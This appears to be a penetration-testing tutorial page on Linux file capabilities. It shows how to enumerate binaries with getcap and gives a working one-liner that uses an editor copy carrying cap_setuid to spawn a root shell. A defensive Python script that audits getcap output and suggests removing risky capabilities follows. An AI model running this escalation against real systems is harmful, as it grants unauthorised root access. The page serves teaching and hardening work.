# Capabilities

> For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).
>
> Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.

From the Linux capabilities manual page: <https://man7.org/linux/man-pages/man7/capabilities.7.html>

### Find binaries with file capabilities set

```bash
$ getcap -r / 2>/dev/null
...
/usr/bin/ping = cap_net_raw+ep
/home/jarrett/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
...
```

Notice that both the binaries `/home/jarrett/vim` and `/home/ubuntu/view` have the `cap_setuid+ep` value set. A copy of an editor sitting in a home directory with `cap_setuid` effective and permitted is as dangerous as a setuid-root binary, since the program can call `setuid(0)` from within its own scripting interpreter.

With the commands found from GTFOBins (<https://gtfobins.github.io/gtfobins/view/#capabilities>), the `/home/ubuntu/view` binary can be used for privilege escalation:

```bash
# Assuming the system is using Python3
$ /home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

root# whoami
root
```

Notice that `/home/ubuntu/view` is used instead of simply the `view` command: file capabilities belong to that specific file, so the copy in `/home/ubuntu` must be run by its full path. The system-wide `view` found via `PATH` carries no capability and would just drop into an editor.
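From the defender's side, the same `getcap -r /` enumeration is the audit that should have caught these two files before an attacker did. The script below is an added example (not part of the original page) that parses `getcap` output, flags entries carrying high-risk capabilities or living outside the distribution's binary directories, and prints the `setcap -r` command that strips the capability. The sample output embedded in it is constructed for the example (it reuses the two paths from this page plus invented ones); the list of "high-risk" capabilities and "trusted" directories is an assumption to tune per host.

```python
import re
import sys
from typing import NamedTuple, Optional, Tuple, FrozenSet, List

# Capabilities that let a process bypass ownership/permission checks or become
# root outright. A file carrying any of these deserves the same scrutiny as a
# setuid-root binary. (Assumed list for this example; extend per environment.)
HIGH_RISK_CAPS = frozenset({
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_rawio",
})

# Where distribution-managed binaries normally live. A capability on a file
# anywhere else (home directories, /tmp, /opt) is the pattern seen above.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/",
                    "/usr/lib/", "/usr/libexec/")

# getcap has two output syntaxes, depending on the libcap version:
#   older:  /usr/bin/ping = cap_net_raw+ep
#   newer:  /usr/bin/ping cap_net_raw=ep
_OLD_FMT = re.compile(r"^(?P<path>\S+) = (?P<caps>\S+)$")
_NEW_FMT = re.compile(r"^(?P<path>\S+) (?P<caps>\S+=\S*)$")
_CAPSET = re.compile(r"^([a-z0-9_,]+)[+=]([eip]*)$")

# Constructed sample of `getcap -r / 2>/dev/null` output for this example.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/home/jarrett/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/opt/tool/bin/dumper = cap_dac_read_search+ep
"""


class Finding(NamedTuple):
    path: str
    caps: FrozenSet[str]   # capability names on the file
    flags: str             # e/i/p flag letters, e.g. "ep"
    reasons: Tuple[str, ...]


def parse_getcap_line(line: str) -> Optional[Tuple[str, str]]:
    """Split one getcap line into (path, capability text); None if not a getcap line."""
    line = line.strip()
    m = _OLD_FMT.match(line) or _NEW_FMT.match(line)
    return (m.group("path"), m.group("caps")) if m else None


def parse_caps(text: str) -> Optional[Tuple[FrozenSet[str], str]]:
    """'cap_a,cap_b+ep' or 'cap_a=ep' -> ({'cap_a','cap_b'}, 'ep')."""
    m = _CAPSET.match(text)
    if not m:
        return None
    return frozenset(m.group(1).split(",")), m.group(2)


def audit(getcap_output: str) -> List[Finding]:
    """Return the entries a reviewer should look at, with the reason(s) why."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps_text = parsed
        caps = parse_caps(caps_text)
        if caps is None:
            # Multi-clause strings like "cap_a+ep cap_b-i" are not handled here;
            # surface them rather than silently passing them.
            findings.append(Finding(path, frozenset(), caps_text, ("unparsed capability string",)))
            continue
        names, flags = caps
        reasons = []
        risky = names & HIGH_RISK_CAPS
        if risky:
            reasons.append("high-risk capability: " + ",".join(sorted(risky)))
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append("outside distribution binary directories")
        if reasons:
            findings.append(Finding(path, names, flags, tuple(reasons)))
    return findings


def remediation(f: Finding) -> str:
    """setcap -r removes the file capability set entirely (real setcap(8) option)."""
    return "setcap -r " + f.path


if __name__ == "__main__":
    # Pipe real output in:  getcap -r / 2>/dev/null | python3 audit_caps.py
    data = SAMPLE_GETCAP if sys.stdin.isatty() else sys.stdin.read()
    for f in audit(data):
        print(f"{f.path}  [{f.flags}]  {'; '.join(f.reasons)}")
        print("    fix: " + remediation(f))
```

Running it on the constructed sample flags `/home/jarrett/vim`, `/home/ubuntu/view` and `/opt/tool/bin/dumper`, while `/usr/bin/ping` (only `cap_net_raw`, in a system directory) passes. Pair this with a cron or configuration-management check so that a newly appeared `cap_setuid+ep` file in a home directory raises an alert rather than waiting for the next manual `getcap -r`.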

